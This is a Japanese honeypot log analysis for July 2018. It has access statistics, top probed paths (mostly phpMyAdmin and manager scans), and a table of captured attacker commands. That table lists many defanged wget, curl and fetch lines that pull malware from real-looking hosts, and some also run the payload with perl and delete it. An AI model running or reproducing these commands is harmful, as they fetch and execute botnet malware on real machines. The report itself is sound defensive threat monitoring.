ハニーポットのログ分析(2018年07月度)
2018年7月度の統計による分析です。
まずは、件数の推移です。7月度の総アクセス件数は5,266件でした。
さほど大きな件数にはなっていません。前月対比では減少傾向です。
全体としての件数は少ないながら、まれにスパイクする日もあります。
メソッドとパスの統計トップ20です。
アクセス数が多い日に集中してアクセスが多いものが多く、そうでないものは一部MyPhPAdminに関するもののようです。
複数検知していたIoTを狙った攻撃もアクセス数ベースで見るとさほどでもないようです。
| method | path | count |
| GET | / | 1114 |
| GET | /manager/html | 516 |
| POST | /command.php | 153 |
| GET | /index.action | 145 |
| HEAD | / | 68 |
| GET | /phpMyAdmin/index.php | 47 |
| GET | /pma/index.php | 45 |
| GET | /pmd/index.php | 44 |
| POST | /qq.php | 43 |
| GET | /mysqladmin/index.php | 43 |
| GET | /web/phpMyAdmin/index.php | 42 |
| GET | /pmamy2/index.php | 42 |
| GET | /pmamy/index.php | 42 |
| GET | /phpmyadmin0/index.php | 41 |
| GET | /phpmyadmin/index.php | 41 |
| GET | /admin/index.php | 41 |
| GET | /PMA/index.php | 41 |
| GET | /index.php | 40 |
| GET | /dbadmin/index.php | 40 |
| GET | /db/index.php | 40 |
一応、送信元IPの統計トップ20です。大体同じくらいで出ているということは、それだけ攻撃者側が頻繁に攻撃基盤を乗り換えながら実行していることかと思います。
| srcIP | count |
| 39.108.54.xx | 334 |
| 179.218.108.xx | 156 |
| 47.52.105.xx | 135 |
| 139.219.10.xx | 135 |
| 116.196.89.xx | 121 |
| 103.98.115.xx | 120 |
| 89.248.172.xx | 119 |
| 47.106.168.xx | 113 |
| 139.199.111.xx | 111 |
| 120.79.154.xx | 111 |
| 122.152.197.xx | 108 |
| 123.56.216.xx | 104 |
| 111.231.223.xx | 102 |
| 211.159.164.x | 101 |
| 183.131.83.xx | 99 |
| 120.77.36.xx | 99 |
| 203.195.224.xx | 97 |
| 120.78.185.xxx | 95 |
| 47.52.225.xxx | 93 |
| 103.212.183.xxx | 93 |
ハンティングログの統計です。
| path | counts |
| wget hxxp://199.195.254.118/dlink | 14 |
| wget hxxp://104.244.72.82/k | 12 |
| wget -c hxxp://wap.tfddos.net:57843/linux | 11 |
| wget -c hxxp://111.67.194.29:32322/Manager | 10 |
| wget+hxxp://199.195.254.118/jaws | 9 |
| wget hxxp://185.62.190.191/r | 8 |
| wget hxxp://178.128.11.199/rvs | 7 |
| wget hxxp://178.128.11.199/qtx.mips | 7 |
| wget -P /tmp hxxp://hfs.mhacker.cc:9278/Linux.server | 6 |
| wget hxxp://185.172.164.41/e | 6 |
| wget -c hxxp://aaa.linuxa.club:57843/linux | 5 |
| wget hxxp://g.mariokartayy.com/x | 4 |
| wget hxxp://222.186.153.142:26591/nodebase | 4 |
| wget -c -q hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr ; curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr | 3 |
| wget -c hxxp://103.55.13.68:81/server | 3 |
| fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr | 3 |
| curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr | 3 |
| wget hxxp://mafiagalati.hi2.ro/unix ; curl -O hxxp://mafiagalati.hi2.ro/unix ; fetch hxxp://mafiagalati.hi2.ro/unix | 2 |
| wget hxxp://hakaiboatnet.pw/dlink | 2 |
| wget -c hxxp://23.249.162.123:9998/servic | 2 |
| fetch hxxp://mafiagalati.hi2.ro/unix | 2 |
| curl -O hxxp://mafiagalati.hi2.ro/unix ; fetch hxxp://mafiagalati.hi2.ro/unix | 2 |
| wget hxxp://xo.alprazolam.rip/dlink | 1 |
| wget hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr ; curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr | 1 |
| wget hxxp://217.61.6.127/t | 1 |
| wget -c -q hxxp://139.199.211.175/data/data/msr;perl msr;rm -rf msr ; curl -O hxxp://139.199.211.175/data/data/msr;perl msr;rm -rf msr; fetch hxxp://139.199.211.175/data/data/msr | 1 |
| wget -c hxxp://23.249.162.123:9998/se1 | 1 |
| wget -c hxxp://111.67.194.29:4444/Manager | 1 |
| wget -c hxxp://103.55.13.68:81/servic | 1 |
| wget -c hxxp://103.55.13.68:81/nux | 1 |
| fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr | 1 |
| fetch hxxp://139.199.211.175/data/data/msr | 1 |
| curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr | 1 |
| curl -O hxxp://139.199.211.175/data/data/msr;perl msr;rm -rf msr; fetch hxxp://139.199.211.175/data/data/msr | 1 |
統計はとりましたが、面白いものになっているかというと…という感じですので、見せ方は何か継続して考えたいと思います。
以上です。
